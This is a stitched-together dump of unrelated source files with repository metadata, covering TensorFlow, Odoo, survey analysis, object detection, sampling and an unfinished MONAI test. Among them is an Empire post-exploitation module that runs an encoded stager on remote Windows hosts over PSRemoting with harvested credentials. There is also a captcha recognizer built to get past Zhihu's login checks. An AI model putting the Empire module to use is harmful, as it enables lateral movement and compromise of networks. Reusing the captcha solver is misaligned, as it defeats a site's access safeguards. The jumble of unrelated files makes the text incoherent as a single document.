elements: # d vec[Y] / d vec[X] @[k(i,j), k(i,j)] # = X[j,j] + I[i=j] X[i,j] # = 2 X[j,j]. # Since there is a 2 X[j,j] term for every lower-triangular element of X we # conclude: # |Jac(d vec[Y]/d vec[X])| = 2^p prod_{j=0}^{p-1} X[j,j]^{p-j}. if self._static_event_ndims == 0: if self.validate_args: is_positive = check_ops.assert_positive( x, message="All elements must be positive.") x = control_flow_ops.with_dependencies([is_positive], x) return math.log(2.) + math_ops.log(x) diag = array_ops.matrix_diag_part(x) if self.validate_args: is_matrix = check_ops.assert_rank_at_least( x, 2, message="Input must be a (batch of) matrix.") shape = array_ops.shape(x) is_square = check_ops.assert_equal( shape[-2], shape[-1], message="Input must be a (batch of) square matrix.") # Assuming lower-triangular means we only need check diag>0. is_positive_definite = check_ops.assert_positive( diag, message="Input must be positive definite.") x = control_flow_ops.with_dependencies( [is_matrix, is_square, is_positive_definite], x) # Create a column vector equal to: [p, p-1, ..., 2, 1].T. if x.get_shape().ndims is None or x.get_shape()[-1].value is None: p = array_ops.shape(x)[-1] else: p = x.get_shape()[-1].value exponents = array_ops.expand_dims( math_ops.linspace(math_ops.cast(p, dtype=x.dtype), 1., p), dim=1) sum_weighted_log_diag = array_ops.squeeze( math_ops.matmul(math_ops.log(diag), exponents), squeeze_dims=-1) fldj = p * math.log(2.) + sum_weighted_log_diag if x.get_shape().ndims is not None: fldj.set_shape(x.get_shape()[:-2]) return fldj
3b804e792b3544778740271e6b7778c33013a07a
8b0fc85f784618b81a63a038d65cad2354e674ac
/cmo_hr_expense_report/models/__init__.py
4a84a60ed89128ff60182e89b87d001de8b6a8ec
[]
no_license
ecosoft-odoo/cmo_specific
2e284fc0be2cf2de7986cbfe9fe233ef2c964d41
12cc42d9555b3b587f148cb36bac8e7e3f7c1593
refs/heads/master
2021-09-18T03:33:35.342095
2021-04-12T04:25:28
2021-04-12T04:25:28
113,545,569
3
12
null
2022-01-20T11:47:52
2017-12-08T07:31:34
Python
UTF-8
Python
false
false
42
py
# -*- coding: utf-8 -*- from . import hr
219cef7e0bdb3c19ef844fd2b9f31656dcc58f07
2817ecd7e48c4decba12ee76e451727c1a6acf14
/scripts/legacy/survey_distribution.py
645981e58fef1bc3a1c76cafe786360c095677dc
[]
no_license
schwa-lab/sharingnews
6fcef71c16a03fb3a4a56c11322ba5c8ceb59582
81c87176c7b37511f15a97189f03d90d5074d0fb
refs/heads/master
2021-01-16T21:46:23.108811
2018-02-12T06:33:30
2018-02-12T06:33:30
26,195,626
3
0
null
2018-02-12T06:33:16
2014-11-05T00:39:40
Python
UTF-8
Python
false
false
3,985
py
from __future__ import print_function, division from collections import Counter, defaultdict import operator from likeable.cleaning import strip_subdomains MONTH_FIELD = 1 def get_status_binary(l): status = l[8] if status == '200': return True else: return False def get_status_group(l): status = l[8] if status.startswith('<') or status == '-': return 'ERR' elif status == '200?': return 'HOME' else: return status[0] + 'xx' def _norm_date(dt, n_months): if n_months is None: return return (dt[:4] + '-' + '%02d' % ((int(dt[5:7]) - 1) // n_months * n_months + 1)) def get_distribs(key_field, get_cat, n_months, weight=None): # Group survey by status (cat), sig (key) and date group distrs = defaultdict(Counter) for l in open('data/sample-survey-v2'): l = l.rstrip('\r\n').split('\t') dt = _norm_date(l[MONTH_FIELD], n_months) distrs[l[key_field], dt][get_cat(l)] += 1 if weight is None: get_weight = lambda k: 1 else: get_weight = weight.get for k in distrs: distr = distrs[k] w = get_weight(k) or 0 # HACK due to dirty data? total = sum(distr.values()) distrs[k] = {c: w * n / total for c, n in distr.items()} return distrs def get_sig_weights(n_months): # Get overall frequency for each key and date sig_weight = defaultdict(int) for l in open('data/url-sig-frequencies.txt'): l = l.rstrip('\r\n').split('\t') try: sig_weight[l[2], _norm_date(l[1], n_months)] += int(l[0]) except (IndexError, ValueError): # Dirty data pass sig_weight.default_factory = None return sig_weight def _sig_to_domain(sig): return strip_subdomains(sig.split('/')[0]) def regroup_by_domain(distrs): out = defaultdict(lambda: defaultdict(float)) for (k, m), distr in distrs.iteritems(): for c, n in distr.iteritems(): out[_sig_to_domain(k), m][c] += n return out def get_all_cats(distrs): cats = set() for distr in distrs.itervalues(): for c in distr: cats.add(c) return sorted(cats) if __name__ == '__main__': import argparse ap = argparse.ArgumentParser() ap.add_argument('-m', '--month-quant', type=int, help='Group this many months together (default, all time)') ap.add_argument('--by-sig', default=False, action='store_true') ap.add_argument('--use-end-sig', default=False, action='store_true', help='Calculates status on the basis of likely canonical ' 'URL signature') cat_opts = { 'status-binary': get_status_binary, 'status-group': get_status_group, } ap.add_argument('-c', '--cats', choices=cat_opts.keys(), default='status-binary') args = ap.parse_args() n_months = getattr(args, 'month_quant', None) if n_months is not None and 12 % n_months != 0: ap.error('--month-quant (-m) must divide into 12') sig_weight = get_sig_weights(n_months) key_field = 4 # start sig if args.use_end_sig: tmp = get_distribs(key_field, operator.itemgetter(7), n_months, weight=sig_weight) sig_weight = defaultdict(float) for (start_sig, mo), distr in tmp.iteritems(): for end_sig, n in distr.iteritems(): sig_weight[end_sig, mo] += n key_field = 7 # end sig distrs = get_distribs(key_field, cat_opts[args.cats], n_months, weight=sig_weight) if not args.by_sig: distrs = regroup_by_domain(distrs) # output all_cats = get_all_cats(distrs) print('key', 'month', *all_cats, sep='\t') for k, v in sorted(distrs.iteritems()): k = list(k) k.extend(v.get(c, 0) for c in all_cats) print(*k, sep='\t')
495ba133d20be9696a894db3f3accc2f2fd82015
326c6ad82d59bb7509c02c76695ea9035993da70
/lib/modules/powershell/lateral_movement/invoke_psremoting.py
4680387727765b745328f6c6d9f005817ee6c58e
[ "BSD-3-Clause" ]
permissive
Arvanaghi/Empire
0c08bd7ddfba9be10e96bb0834b8ce3bc829059b
fd168ebf8acb1c2ee59d56f2c393ebd7a297603e
refs/heads/master
2021-01-20T14:15:34.864581
2017-08-05T17:51:44
2017-08-05T17:51:44
99,435,848
2
0
null
2017-08-05T16:50:16
2017-08-05T16:50:16
null
UTF-8
Python
false
false
5,441
py
from lib.common import helpers class Module: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Invoke-PSRemoting', 'Author': ['@harmj0y'], 'Description': ('Executes a stager on remote hosts using PSRemoting.'), 'Background' : False, 'OutputExtension' : None, 'NeedsAdmin' : False, 'OpsecSafe' : True, 'Language' : 'powershell', 'MinLanguageVersion' : '2', 'Comments': [] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent' : { 'Description' : 'Agent to run module on.', 'Required' : True, 'Value' : '' }, 'CredID' : { 'Description' : 'CredID from the store to use.', 'Required' : False, 'Value' : '' }, 'ComputerName' : { 'Description' : 'Host[s] to execute the stager on, comma separated.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : True, 'Value' : '' }, 'UserName' : { 'Description' : '[domain\]username to use to execute command.', 'Required' : False, 'Value' : '' }, 'Password' : { 'Description' : 'Password to use to execute command.', 'Required' : False, 'Value' : '' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self): listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] userName = self.options['UserName']['Value'] password = self.options['Password']['Value'] script = """Invoke-Command """ # if a credential ID is specified, try to parse credID = self.options["CredID"]['Value'] if credID != "": if not self.mainMenu.credentials.is_credential_valid(credID): print helpers.color("[!] CredID is invalid!") return "" (credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0] self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName) self.options["Password"]['Value'] = password if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) if launcher == "": return "" else: # build the PSRemoting execution string computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\"" script += " -ComputerName @("+computerNames+")" script += " -ScriptBlock {" + launcher + "}" if self.options["UserName"]['Value'] != "" and self.options["Password"]['Value'] != "": # add in the user credentials script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential" script += ";'Invoke-PSRemoting executed on " +computerNames +"'" return script
ac49ac9a742dde207c205fdf63ceaf884a3a20e3
70ed9ef2867b2c0ca96596f8fdd75c31af5ac116
/build/lib/ArticleSpider/zheye/__init__.py
83954ea69947cd42adcc0f1dd46ef9f117c78f71
[]
no_license
nanmuyao/ArticleSpider
b24aef4bbd761951dd1bd450e49de8f40c96f289
a75cfaa028b1717636866b5833cdcaa29a2ec43a
refs/heads/master
2021-07-24T16:16:20.597430
2017-11-05T08:01:53
2017-11-05T08:01:53
109,280,103
1
0
null
null
null
null
UTF-8
Python
false
false
1,802
py
#!/usr/bin/env python # -*- coding: UTF-8 -*- # Recognizing class from sklearn.mixture import GaussianMixture from PIL import Image from ArticleSpider.zheye import util import numpy as np class zheye: def __init__(self): ''' load model ''' import os import keras full_path = os.path.realpath(__file__) path, filename = os.path.split(full_path) self.model = keras.models.load_model(path +'/zheyeV3.keras') def Recognize(self, fn): im = Image.open(fn) im = util.CenterExtend(im, radius=20) vec = np.asarray(im.convert('L')).copy() Y = [] for i in range(vec.shape[0]): for j in range(vec.shape[1]): if vec[i][j] <= 200: Y.append([i, j]) gmm = GaussianMixture(n_components=7, covariance_type='tied', reg_covar=1e2, tol=1e3, n_init=9) gmm.fit(Y) centers = gmm.means_ points = [] for i in range(7): scoring = 0.0 for w_i in range(3): for w_j in range(3): p_x = centers[i][0] -1 +w_i p_y = centers[i][1] -1 +w_j cr = util.crop(im, p_x, p_y, radius=20) cr = cr.resize((40, 40), Image.ANTIALIAS) X = np.asarray(cr.convert('L'), dtype='float') X = (X.astype("float") - 180) /200 x0 = np.expand_dims(X, axis=0) x1 = np.expand_dims(x0, axis=3) global model if self.model.predict(x1)[0][0] < 0.5: scoring += 1 if scoring > 4: points.append((centers[i][0] -20, centers[i][1] -20)) return points
0db2aa9ff306478ee3e5479f7c42bd343136846d
795f0081004920c15c178c43b00432cb8e7ca586
/controller/src/object_detection.py
3d2d3f1083a94ede6cb0ff9622c6d4a24be2a5ba
[]
no_license
60alex60/ECE140aLab6
e6e9985a07e5615a5678d817cdfb031802322425
f966af1d7aa87ab9f602bd3ad3f4cdea13ee7421
refs/heads/master
2023-04-05T15:31:52.014565
2021-03-05T05:41:31
2021-03-05T05:41:31
353,224,446
0
0
null
null
null
null
UTF-8
Python
false
false
3,292
py
import numpy as np import cv2 import time class ImgProc(): def __init__(self): # read pre-trained model and config file self.net = cv2.dnn.readNet("object_detection/yolov4-tiny.weights", "object_detection/yolov4-tiny.cfg") # read class names from text file self.classes = None with open("object_detection/coco.names", 'r') as f: self.classes = [line.strip() for line in f.readlines()] # generate different colors for different classes self.COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3)) # function to get the output layer names # in the architecture def get_output_layers(self, net): layer_names = net.getLayerNames() output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()] return output_layers # function to draw bounding box on the detected object with class name def draw_bounding_box(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h): label = str(self.classes[class_id]) color = self.COLORS[class_id] cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2) cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2) def detect_objects(self, img): W = img.shape[1] H = img.shape[0] # create input blob sz = (416, 416) # (224,224) normalization = 1.0 / 255.0 blob = cv2.dnn.blobFromImage(img, normalization, sz, (0, 0, 0), True, crop=False) # set input blob for the network self.net.setInput(blob) # run inference through the network # and gather predictions from output layers outs = self.net.forward(self.get_output_layers(self.net)) # initialization class_ids = [] confidences = [] boxes = [] centroids = [] conf_threshold = 0.3 nms_threshold = 0.1 # For each detetion from each output layer get the confidence, class id, bounding box params and ignore weak detections (confidence < 0.5) for out in outs: for detection in out: scores = detection[5:] class_id = np.argmax(scores) confidence = scores[class_id] if confidence > conf_threshold: center_x = int(detection[0] * W) center_y = int(detection[1] * H) w = int(detection[2] * W) h = int(detection[3] * H) x = center_x - w / 2 y = center_y - h / 2 class_ids.append(class_id) confidences.append(float(confidence)) boxes.append([x, y, w, h]) centroids.append((center_x, center_y)) # Apply non-max suppression to prevent duplicate detections indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold) # Go through the detections remaining after NMS and draw bounding boxes detections = [] frame = img.copy() for i in indices: i = i[0] box = boxes[i] x = box[0] y = box[1] w = box[2] h = box[3] self.draw_bounding_box(frame, class_ids[i], confidences[i], round(x), round(y), round(x + w), round(y + h)) detections.append((self.classes[class_ids[i]], centroids[i], box)) print("Detected Objects: ", detections) return detections, frame if __name__ == "__main__": img = cv2.imread('sample_img.png') imgProc = ImgProc() imgProc.detect_objects(img)
[ "66690702+github-classroom[bot]@users.noreply.github.com" ]
66690702+github-classroom[bot]@users.noreply.github.com
bfabb2739c171793041ee29b0c6b4b331220b17b
d60e74dae2c4bcef6bc7c8faea51dc6b245de42f
/package/inference/mc/population.py
3e105cf0362f917f410e330bcc5f023dc5518596
[]
no_license
tloredo/inference
37664ef62317f32ad5ab25c56ead1c49bfc91045
215de4e93b5cf79a1e9f380047b4db92bfeaf45c
refs/heads/master
2021-09-09T06:24:16.690338
2021-09-01T21:03:52
2021-09-01T21:03:52
142,254,094
3
0
null
null
null
null
UTF-8
Python
false
false
10,441
py
""" Classes and functions for describing and sampling discrete populations. """ # TODO: Distinguish sizes from weights (normalized). __author__ = "Tom Loredo" from numpy import array, random from _ppssampler import _ppssampler, equalprob from _ppssampler import set_rng_state, get_rng_state from inference.utils.pl import pl # try: # import pylab as pl # except ImportError: # pl = None __all__ = ['Population', 'Population1D'] class Population(object): def __init__(self, items=None, weights=None): if weights is None: # The equal probability case self.equiprob = True try: # items is a sequence self.npopn = len(items) self.items = items except TypeError: # items is an int self.npopn = int(items) self.items = list(range(self.npopn)) elif items is None: # Use indices as items self.equiprob = False self.npopn = len(weights) self.items = list(range(self.npopn)) self.weights = array(weights, float) else: # Use a list of items *and* weights self.equiprob = False self.npopn = len(weights) if len(items) != self.npopn: raise ValueError('Lengths of items & weights must match!') self.items = items self.weights = array(weights, float) self.did_init = False self.did_Sampford_init = False self.did_Sampford_tables = False def sample(self, nsamp): """ Return a set of nsamp samples from the population, sampled with replacement. """ # *** Implement equiprob case. if self.equiprob: raise NotImplementedError('Awaiting code...') if not self.did_init: self.sampler = _ppssampler(self.weights) self.did_init = True # Track the RNG state within the sampler, to update NumPy's RNG state. # Internally we only use the MT state; any extra state for cached # normal or other samples can just be copied. rng_state = random.get_state() mt_state, extra_state = rng_state[:3], rng_state[3:] set_rng_state(*mt_state) # *** modify to handle full rng state indices = self.sampler.sample(nsamp) new_state = list(get_rng_state()) new_state.extend(extra_state) random.set_state(new_state) return [self.items[i] for i in indices] def max_subset(self): """ Return the maximum sample size for PPS sampling without replacement. The limiting size arises because PPS sampling without replacement requires nsamp*(max normalized weight) <= 1. If this is violated for the desired sample size, you may consider trimming the large weight members from the population and including them in every sample (of course, they will all have inclusion probability of unity, regardless of size). """ if self.did_Sampford_init: return int(1./self.max_wt) else: return int(sum(self.weights)/self.weights.max()) def subset_pps(self, nsamp): """ Return a sample of nsamp distinct items from the population, sampled without replacement with probability proportional to size (PPS) according to Sampford's sampling scheme. """ # Copy the whole population if nsamp = npopn. if nsamp == self.npopn: return [item for item in self.items] set_rng_state(*random.get_state()) if self.equiprob: pool = arange(self.npopn) indices = equalprob(nsamp, pool) else: # This part of setup has to be done before any sampling. if not self.did_init: print('Initing ppssampler...') self.sampler = _ppssampler(self.weights) self.did_init = True # This part has to be done before any sampling w/o replacement. if not self.did_Sampford_init: print('Initing wts...') self.sort_indices, self.sort_wts, self.tot_wt = \ self.sampler.prepwts(self.weights) self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed self.nsamp = 0 self.did_Sampford_init = True self.did_Sampford_tables = False # This part has to be done when sample size changes. if self.nsamp != nsamp: print('Initing ratios...') if nsamp > self.npopn: raise ValueError('nsamp larger than population size!') if nsamp*self.max_wt > 1: raise ValueError('Sample size too large for PPS sampling!') self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt) self.did_Sampford_tables = False self.nsamp = nsamp self.ntry, sindices = self.sampler.samplenr() indices = [self.sort_indices[i] for i in sindices] result = [self.items[i] for i in indices] random.set_state(get_rng_state()) return result def subset_pps5(self, nsamp): """ Return a sample of nsamp distinct items from the population, sampled without replacement with probability proportional to size (PPS) according to Sampford's sampling scheme. 5-table lookup samplers are used within Sampford's algorithm to accelerate the sampling for large populations. """ # Copy the whole population if nsamp = npopn. if nsamp == self.npopn: return [item for item in self.items] set_rng_state(*random.get_state()) if self.equiprob: pool = arange(self.npopn) indices = equalprob(nsamp, pool) else: # This part of setup has to be done before any sampling. if not self.did_init: print('Initing ppssampler...') self.sampler = _ppssampler(self.weights) self.did_init = True # This part has to be done before any sampling w/o replacement. if not self.did_Sampford_init: print('Initing wts...') self.sort_indices, self.sort_wts, self.tot_wt = \ self.sampler.prepwts(self.weights) self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed self.nsamp = 0 self.did_Sampford_init = True # This part has to be done when sample size changes. if self.nsamp != nsamp: print('Initing ratios...') if nsamp > self.npopn: raise ValueError('nsamp larger than population size!') if nsamp*self.max_wt > 1: raise ValueError('Sample size too large for PPS sampling!') self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt) self.sampler.prepratiotables() self.did_Sampford_tables = True self.nsamp = nsamp # This may happen if subset_pps is called before subset_pps5. if not self.did_Sampford_tables: print('Initing ratio tables...') self.sampler.prepratiotables() self.did_Sampford_tables = True self.ntry, indices = self.sampler.samplenr5() # Note the 5-table version returns unsorted indices. # indices = [self.sort_indices[i] for i in sindices] result = [self.items[i] for i in indices] random.set_state(get_rng_state()) return result class Population1D(Population): """ A Population object specialized for populations indexed by a single (1-D) real-valued quantity that gives the "size" of each member. """ def __init__(self, vals, weights, err=None): indices = array(vals).argsort() self.vals = vals[indices].copy() self.weights = array(weights)[indices].copy() if err == None: self.err = None else: self.err = array(err)[indices].copy() Population.__init__(self, self.vals, self.weights) self.cdf = self.weights.cumsum() self.hazard = self.cdf[::-1].copy() def haz_pts(self, start=None, end=None): """ Return arrays of points specifying the hazard dist'n over the range [start, end]. The range must fully span the range of detected values. Also return arrays of points specifying error bars, if defined on creation. """ if start is None: start = self.vals[0] if end is None: end = self.vals[-1] if start>self.vals[0] or end<self.vals[-1]: raise ValueError('Range must span the range of sampled values!') # Start the descending CDF. absc, ord = [start], [1.] # Add pairs of points for each uncensored value, defining jumps. for x, p in zip(self.vals, self.hazard): absc.extend([x, x]) ord.extend([ord[-1], p]) # The last step is zero. absc.append(end) ord.append(0.) if self.err == None: return array(absc), array(ord) else: # For error bars, just copy the stored errors in the middle of # the CDF bins. eabsc = [] for i in range(len(self.vals)-1): eabsc.append( .5*(self.vals[i]+self.vals[i+1]) ) eabsc.append( .5*(self.vals[-1]+end) ) return array(absc), array(ord), array(eabsc), self.hazard.copy(), \ self.err.copy() def plot(self, start=None, end=None): """ Plot the hazard over the range [start,end], which must span the range of uncensored values. """ if not pl: raise RuntimeError('Cannot plot without pylab!') if start is None: start = self.vals[0] if end is None: end = self.vals[-1] if self.err == None: a, o = self.haz_pts(start, end) else: a, o, ea, eo, ee = self.haz_pts(start, end) pl.plot(a, o, 'b-', linewidth=2) if self.err != None: pl.errorbar(ea, eo, ee, fmt='o', markersize=0)
fc65babef9b7d7077b94f35d2c17bcd73e6ea202
ac305c6739541e84857e297f8eb1b19417978548
/78.py
669cd4df43e886cd23adf6230f54103530d8dd28
[]
no_license
imhardikj/git_test
d6608d6c02e0bc454f9dd31ffbbc5704a7046a61
43f0de2e9ac09ecd4fdfee27879fd8ae354a0685
refs/heads/master
2020-03-27T21:56:46.394739
2018-09-03T11:27:58
2018-09-03T11:27:58
147,189,474
0
0
null
null
null
null
UTF-8
Python
false
false
135
py
def greet_user(username): """Display a simple greeting.""" print("Hello, " + username.title() + "!") greet_user('jesse')
b92c943549a132c92ed17f40a08639a3e024897f
106983cf0b8df622f514ecff2bb2fa4c794c9dac
/Misc/Raspberry Pi Things/Motors/stringComparison.py
c9d425c4e5b4eeabd02957268eb17c72dcf90889
[]
no_license
michael5486/Senior-Design
2d9ae521c637abf7c0825f85b32752ad61c62744
6b6c78bed5f20582a9753a9c10020c709d6b6e53
refs/heads/master
2021-01-19T09:58:35.378164
2017-05-26T17:17:13
2017-05-26T17:17:13
67,556,475
0
0
null
null
null
null
UTF-8
Python
false
false
179
py
testVar = None run = True while run == 1: testVar = raw_input("Ask user for something.\n") if testVar == "exit": run = False print "System Exiting..." else: print testVar
5b9c1aae3f26483755e82ecbe9dbc62f68a649ff
9a343c495459e79dc408a102730bcaeac7fa8886
/chapter9/SuperMattAdmin/ModelForm/urls.py
e330642ce8f8b5b0fcd8f30304a21a71719bd6f6
[ "MIT" ]
permissive
MMingLeung/Python_Study
62d3ae92bf6760de0804aa5792f53fb3799486a2
4ff1d02d2b6dd54e96f7179fa000548936b691e7
refs/heads/master
2022-12-27T12:53:05.186800
2018-03-07T04:34:36
2018-03-07T04:34:36
92,124,981
3
1
MIT
2021-06-10T18:35:33
2017-05-23T03:28:52
JavaScript
UTF-8
Python
false
false
1,316
py
"""ModelForm URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url,include from django.contrib import admin from app01 import views from supermatt.service import test_v1 urlpatterns = [ # url(r'^admin/', admin.site.urls), # include 如果参数是模块路径,导入模块找urlpatterns变量,获取列表 # url(r'^test/$', include('app01.urls')), # 可以这样写 # url(r'^test/$', ([ # url(r'^test/', views.test), # url(r'^test/', views.test), # url(r'^test/', views.test), # ],'app_name','name_space')), url(r'^su/', test_v1.site.urls), url(r'^test/', views.test), url(r'^test2/', views.test2), ]
a14a08ab5d69e160bff8619e5fa0c565a6878d76
03b30e760f571e309ab1539edbc24ce0ff47c141
/cyly/test1.py
0ee1339e5bbd9f9f590df225b40d8211bac483c9
[]
no_license
latata666/newcoder
548f32ab3acd75b592ce7f7b399ecdf340e747d8
e9206ab924899a2985bece312777e3b5d55c6f60
refs/heads/master
2022-12-12T22:46:03.255804
2020-08-31T02:27:17
2020-08-31T02:27:17
263,274,517
0
0
null
null
null
null
UTF-8
Python
false
false
876
py
# -*- coding: utf-8 -*- # @Time : 2020/5/15 10:41 # @Author : Mamamooo # @Site : # @File : test1.py # @Software: PyCharm """ """ import logging # create logger with 'spam_application' logger = logging.getLogger('spam_application') logger.setLevel(logging.DEBUG) # create file handler which logs even debug messages fh = logging.FileHandler('spam.log') fh.setLevel(logging.DEBUG) # create console handler with a higher log level ch = logging.StreamHandler() ch.setLevel(logging.ERROR) # create formatter and add it to the handlers formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') fh.setFormatter(formatter) ch.setFormatter(formatter) # add the handlers to the logger logger.addHandler(fh) logger.addHandler(ch) logger.info('creating an instance of auxiliary_module.Auxiliary') logger.info('done with auxiliary_module.some_function()')
856e9c0036931f4496353a90a125e2e2e94829e8
95aa5a5c10ad18195d7f92e37265d9dff06debe6
/synapse/tools/server.py
55efd5ecbd42ae28f7f5bd3ea0aa56bb306baf18
[ "Apache-2.0" ]
permissive
drstrng/synapse
2679f7c23221ad7d8fd2fbb4745bdcd5275843da
3901f17601821aa0e8b6de4de434309d465fbba2
refs/heads/master
2021-01-17T22:02:29.833824
2015-09-01T18:56:57
2015-09-01T18:56:57
40,968,669
0
0
null
2015-08-18T11:40:51
2015-08-18T11:40:50
Python
UTF-8
Python
false
false
1,358
py
import sys import argparse import importlib import synapse.link as s_link import synapse.cortex as s_cortex import synapse.daemon as s_daemon def main(argv): p = argparse.ArgumentParser(prog='server') p.add_argument('--initmod',help='python module name for daemon init callback') p.add_argument('--cortex', action='append', default=[], help='cortex name,url to share for RMI') p.add_argument('linkurl',nargs='+',help='link urls to bind/listen') opts = p.parse_args(argv) daemon = s_daemon.Daemon() # possibly load/share a cortex or two for nameurl in opts.cortex: name,url = nameurl.split(',',1) core = s_cortex.openurl(url) daemon.addSharedObject(name,core) # fire up requested link servers for url in opts.linkurl: link = s_link.chopLinkUrl(url) daemon.runLinkServer(link) if opts.initmod: mod = importlib.import_module(opts.initmod) meth = getattr(mod,'initDaemon',None) if meth == None: print('error: initmod (%s) has no initDaemon() function!') return # call back the daemon init module meth(daemon) try: daemon.wait() except KeyboardInterrupt as e: print('ctrl-c caught: shutting down') daemon.fini() if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
83fb210fa070a1486e7d0d70933f5079a00249e4
82fce9aae9e855a73f4e92d750e6a8df2ef877a5
/Lab/venv/lib/python3.8/site-packages/OpenGL/raw/GLES2/EXT/sRGB.py
8f6425aa57802b0bcff7a9f104b0879ff0ac08bc
[]
no_license
BartoszRudnik/GK
1294f7708902e867dacd7da591b9f2e741bfe9e5
6dc09184a3af07143b9729e42a6f62f13da50128
refs/heads/main
2023-02-20T19:02:12.408974
2021-01-22T10:51:14
2021-01-22T10:51:14
307,847,589
0
0
null
null
null
null
UTF-8
Python
false
false
648
py
'''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p from OpenGL.constant import Constant as _C # Code generation uses this # End users want this... from OpenGL.raw.GLES2 import _errors _EXTENSION_NAME = 'GLES2_EXT_sRGB' def _f(function): return _p.createFunction(function, _p.PLATFORM.GLES2, 'GLES2_EXT_sRGB', error_checker=_errors._error_checker) GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT = _C('GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT', 0x8210) GL_SRGB8_ALPHA8_EXT = _C('GL_SRGB8_ALPHA8_EXT', 0x8C43) GL_SRGB_ALPHA_EXT = _C('GL_SRGB_ALPHA_EXT', 0x8C42) GL_SRGB_EXT=_C('GL_SRGB_EXT',0x8C40)
9f5c3c2ae5e766b560ed33641653dcbbff6eedfb
b2fef77e77f77b6cfd83da4ec2f89cbe73330844
/tests/test_integration_lazy_samples.py
c365616bc84723bb5c8013fdcf4d08ed6e238a58
[ "Apache-2.0" ]
permissive
Project-MONAI/MONAI
8ef2593cc5fd1cd16e13464f927fe563fe3f5bac
e48c3e2c741fa3fc705c4425d17ac4a5afac6c47
refs/heads/dev
2023-09-02T00:21:04.532596
2023-09-01T06:46:45
2023-09-01T06:46:45
214,485,001
4,805
996
Apache-2.0
2023-09-14T15:19:30
2019-10-11T16:41:38
Python
UTF-8
Python
false
false
9,193
py
# Copyright (c) MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import annotations import os import shutil import tempfile import unittest from glob import glob import nibabel as nib import numpy as np import torch import monai import monai.transforms as mt from monai.data import create_test_image_3d, decollate_batch from monai.transforms.utils import has_status_keys from monai.utils import TraceStatusKeys, set_determinism from tests.utils import HAS_CUPY, DistTestCase, SkipIfBeforePyTorchVersion, skip_if_quick def _no_op(x): return x def run_training_test(root_dir, device="cuda:0", cachedataset=0, readers=(None, None), num_workers=4, lazy=True): print(f"test case: {locals()}") images = sorted(glob(os.path.join(root_dir, "img*.nii.gz"))) segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz"))) train_files = [{"img": img, "seg": seg} for img, seg in zip(images[:20], segs[:20])] device = "cuda:0" if HAS_CUPY and torch.cuda.is_available() else "cpu" # mode 0 and cuda requires CUPY num_workers = 0 if torch.cuda.is_available() else num_workers # define transforms for image and segmentation lazy_kwargs = { "img": {"mode": "bilinear", "device": device, "padding_mode": "border", "dtype": torch.float32}, "seg": {"mode": 0, "device": device, "padding_mode": "nearest", "dtype": torch.uint8}, } train_transforms = mt.Compose( [ mt.LoadImaged(keys=["img", "seg"], reader=readers[0], image_only=True), mt.EnsureChannelFirstd(keys=["img", "seg"]), mt.Spacingd( keys=["img", "seg"], pixdim=[1.2, 0.8, 0.7], mode=["bilinear", 0], padding_mode=("border", "nearest"), dtype=np.float32, ), mt.Orientationd(keys=["img", "seg"], axcodes="ARS"), mt.RandRotate90d(keys=["img", "seg"], prob=1.0, spatial_axes=(1, 